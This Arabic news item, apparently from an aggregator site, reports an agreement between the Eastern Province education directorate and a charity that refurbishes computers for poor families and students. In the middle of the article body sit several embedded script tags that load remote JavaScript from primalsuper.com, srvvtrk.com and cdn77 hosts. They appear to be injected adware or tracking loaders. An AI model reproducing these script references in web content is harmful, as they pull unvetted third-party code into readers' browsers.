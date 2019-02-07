شكرا لقرائتكم خبر عن تأهيل «الحواسيب» للأسر الفقيرة والطلبة المعوزين والان نبدء بالتفاصيل
وأوضح مدير تعليم الشرقية د. ناصر الشلعان، عقب توقيع المذكرة، حرص الإدارة على تفعيل الحراك المجتمعي عبر عقد الشراكات مع القطاعات، التي تترك لها بصمة في دفع عجلة التعليم في مختلف المجالات والبرامج الهادفة باعتبار التعليم مسؤولية الجميع، لافتاً في الوقت نفسه إلى أن توقيع هذه الاتفاقية تشرع إدارته بتعزيز الشراكة المجتمعية مع مختلف مؤسسات المجتمع بما يعود بالنفع على أطراف العملية التعليمية بدءا من المدرسة وانتهاءً بالمنزل، مشيداً بجهود القطاع غير الربحي في سبيل دعم العملية التعليمية، ومنها الجمعية الخيرية لتأهيل الحاسبات الآلية «ارتقاء»، في خدمة حماية البيئة من خلال إعادة تأهيل الحواسيب الآلية وتجهيزها للمستفيدين.
وقال المدير التنفيذي للجمعية د. صالح القوم، إن الاتفاقية تأتي في إطار خطط الجمعية الإستراتيجية بين القطاع الخيري وقطاع التعليم، معبراً عن شكره لتعليم الشرقية على التواصل مع مؤسسات القطاع غير الربحي، ودعم العملية التعليمية بشراكات مجتمعية تضيف الكثير لأطراف الشراكة. ******** async="" src="//1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="//1018433480.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="https://primalsuper.com/optout/set/lat?jsonp=__twb_cb_669827321&key=1fd3b038f796d0b159&cv=1549460408&t=1549460407995" type="text/javascript">******** ******** src="https://primalsuper.com/optout/set/lt?jsonp=__twb_cb_148285307&key=1fd3b038f796d0b159&cv=10003&t=1549460407996" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr5.min.js" type="text/javascript">******** ******** src="https://srvvtrk.com/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51968x8147x&r=1549460408002" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr30_nt.min.js" type="text/javascript">********
كانت هذه تفاصيل خبر تأهيل «الحواسيب» للأسر الفقيرة والطلبة المعوزين لهذا اليوم نرجوا بأن نكون قد وفقنا بإعطائك التفاصيل والمعلومات الكامله ولمتابعة جميع أخبارنا يمكنك الإشتراك في نظام التنبيهات او في احد أنظمتنا المختلفة لتزويدك بكل ما هو جديد.
كما تَجْدَرُ الأشاراة بأن الخبر الأصلي قد تم نشرة ومتواجد على اليوم وقد قام فريق التحرير في الخليج 365 بالتاكد منه وربما تم التعديل علية وربما قد يكون تم نقله بالكامل اوالاقتباس منه ويمكنك قراءة ومتابعة مستجدادت هذا الخبر من مصدره الاساسي.